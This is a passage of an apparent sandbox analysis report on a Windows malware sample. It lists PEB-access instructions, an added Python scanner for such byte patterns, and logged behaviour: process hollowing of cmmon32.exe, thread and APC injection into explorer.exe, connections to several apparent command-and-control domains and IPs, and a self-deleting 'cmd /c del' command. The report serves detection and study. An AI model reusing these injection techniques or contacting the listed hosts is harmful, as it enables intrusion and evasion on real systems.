Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0464740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0464740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0464740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045ABC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_046314FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04648CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0458849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04597D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045B3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04623D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04648D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0463E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0457AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045FA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04583D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0463FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04628DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0458D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0458D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045AFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045AFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_046405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_046405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04572D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04587E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0463AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0463AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0458766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045AA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045AA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0457C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0457C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0457C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0462FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04631608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0457E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045B8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0462FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04648ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045876E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04640EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04640EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04640EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04648F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0458EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0458FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045AA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045AA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459B73D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459B73D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0464070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0464070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045AE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04574F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04574F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045B37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04588794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04590050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04590050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04632073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04641074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04644015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04644015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0458B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_045758EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_0459B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 9_2_04579080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exe, Process token adjusted: Debug
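The `mov eax, dword ptr fs:[00000030h]` entries above are the bytes the sandbox's "reads the PEB" heuristic keys on: on 32-bit Windows FS:[0x30] holds the PEB pointer, and code that reads it is usually walking PEB->Ldr to resolve APIs without an import table or checking PEB->BeingDebugged. As an added illustration (this editor's code, not Joe Sandbox's), the scanner below finds the common x86 encodings of that read in a raw code blob. The byte sequence it scans is constructed for the example, and the base address passed in is a stand-in for the 9_2_045F7xxx region listed above.

```python
"""Find PEB-read idioms (fs:[30h], fs:[18h]->[+30h], gs:[60h]) in raw x86/x64 code.

Added example for this report; the SAMPLE_CODE bytes are constructed, not dumped
from the sample.
"""
import re

# ModRM bytes for "mov r32, [disp32]" (mod=00, rm=101) keyed to the register field.
_MODRM_REG = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
              0x25: "esp", 0x2D: "ebp", 0x35: "esi", 0x3D: "edi"}

# 0x64 = FS segment override. A1 is the short "mov eax, moffs32" form assemblers
# emit for EAX; 8B /r covers the other registers; FF /6 is "push dword ptr fs:[30h]".
_PEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x35\x3D\x2D]|\xFF\x35)\x30\x00\x00\x00")
# Two-step variant: mov eax, fs:[18h] (TEB self pointer) ; mov eax, [eax+30h] (TEB->PEB)
_TEB_THEN_PEB = re.compile(rb"\x64\xA1\x18\x00\x00\x00\x8B\x40\x30")
# 64-bit equivalent: mov rax, qword ptr gs:[60h]
_PEB_READ64 = re.compile(rb"\x65\x48\x8B\x04\x25\x60\x00\x00\x00")


def _describe(match_bytes):
    if match_bytes[1] == 0xA1:
        return "mov eax, dword ptr fs:[30h]"
    if match_bytes[1] == 0xFF:
        return "push dword ptr fs:[30h]"
    return f"mov {_MODRM_REG[match_bytes[2]]}, dword ptr fs:[30h]"


def find_peb_reads(code, base=0):
    """Return a sorted list of (virtual_address, mnemonic) for every PEB read in `code`."""
    hits = []
    for m in _PEB_READ.finditer(code):
        hits.append((base + m.start(), _describe(m.group())))
    for m in _TEB_THEN_PEB.finditer(code):
        hits.append((base + m.start(), "mov eax, fs:[18h]; mov eax, [eax+30h]"))
    for m in _PEB_READ64.finditer(code):
        hits.append((base + m.start(), "mov rax, qword ptr gs:[60h]"))
    return sorted(hits)


# Constructed code fragment: a function prologue, a PEB->Ldr read, then a
# PEB->BeingDebugged check through ECX.
SAMPLE_CODE = bytes.fromhex(
    "558BEC"            # push ebp; mov ebp, esp
    "64A130000000"      # mov eax, dword ptr fs:[30h]        PEB
    "8B400C"            # mov eax, [eax+0Ch]                 PEB->Ldr
    "9090"              # nop; nop
    "648B0D30000000"    # mov ecx, dword ptr fs:[30h]        PEB again
    "0FB64102"          # movzx eax, byte ptr [ecx+2]        PEB->BeingDebugged
    "C3"                # ret
)

if __name__ == "__main__":
    for va, text in find_peb_reads(SAMPLE_CODE, base=0x045F7000):
        print(f"{va:08X}  {text}")
```

Run against a dumped region (for instance the `.unpack` artifacts listed later in this report) with `base` set to the region's load address, and the output lines up with the `9_2_...` function addresses the sandbox prints. Memory dumps of explorer.exe will also contain legitimate hits from ntdll and kernelbase, so the scanner is a triage aid for unpacked payload regions rather than a verdict on its own.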

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 62.149.128.40 80
          Source: C:\Windows\explorer.exe, Domain query: www.growwithjenn.com
          Source: C:\Windows\explorer.exe, Domain query: www.oilleakgames.com
          Source: C:\Windows\explorer.exe, Network Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exe, Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe, Domain query: www.goldgrandpa.com
          Source: C:\Windows\explorer.exe, Domain query: www.bring-wellness.com
          Source: C:\Windows\explorer.exe, Domain query: www.sw-advisers.com
          Source: C:\Windows\explorer.exe, Network Connect: 165.22.38.5 80
          Source: C:\Windows\explorer.exe, Domain query: www.goodlukc.com
          Source: C:\Windows\explorer.exe, Domain query: www.freshdeliciousberryfarm.com
          Source: C:\Windows\explorer.exe, Domain query: www.goldinsacks.com
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe, Network Connect: 157.245.232.77 80
          Source: C:\Windows\explorer.exe, Domain query: www.2dmaxximumrecords.com
          Source: C:\Windows\explorer.exe, Domain query: www.allyexpense.com
          Source: C:\Windows\explorer.exe, Domain query: www.protectpursuit.com
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Section loaded: unknown target: C:\Users\user\Desktop\UGGJ4NnzFz.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmmon32.exe, Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: CA0000
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Process created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Windows\SysWOW64\cmmon32.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: explorer.exe, 00000005.00000000.222167961.0000000001398000.00000004.00000020.sdmp, Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.223815044.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmp, Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.223815044.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmp, Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.223815044.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmp, Binary or memory string: Progmanlock
